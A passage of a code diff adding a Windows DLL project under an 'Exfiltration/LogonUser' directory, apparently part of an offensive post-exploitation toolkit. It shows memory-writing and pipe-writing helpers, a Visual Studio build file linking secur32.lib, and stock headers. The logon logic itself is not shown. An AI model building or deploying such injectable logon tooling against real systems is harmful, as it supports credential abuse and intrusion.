+size_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address)
+{
+	size_t size = lstrlenW(str) * sizeof(wchar_t);
+	uniStr->Length = (USHORT)size;
+	uniStr->MaximumLength = (USHORT)size;
+	uniStr->Buffer = (PWSTR)address;
+	memcpy(address, str, size);
+	return size;
+}
+
+void WriteErrorToPipe(string errorMsg, HANDLE pipe)
+{
+	const char* error = errorMsg.c_str();
+	DWORD bytesWritten = 0;
+	WriteFile(pipe, error, strlen(error),  &bytesWritten, NULL);
+}

Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj

@@ -0,0 +1,176 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>logon</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v110</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v110</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="logon.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters

@@ -0,0 +1,39 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="logon.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="dllmain.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>

Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp

@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// logon.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file

Exfiltration/LogonUser/LogonUser/logon/stdafx.h

@@ -0,0 +1,25 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
+// Windows Header Files:
+#include "targetver.h"
+#include <stdio.h>
+#include <tchar.h>
+#include <iostream>
+#include <string>
+#include <fstream>
+#include <ostream>
+#include <mutex>
+#include <Windows.h>
+#include <NTSecAPI.h>
+
+
+
+// TODO: reference additional headers your program requires here

Exfiltration/LogonUser/LogonUser/logon/targetver.h

@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>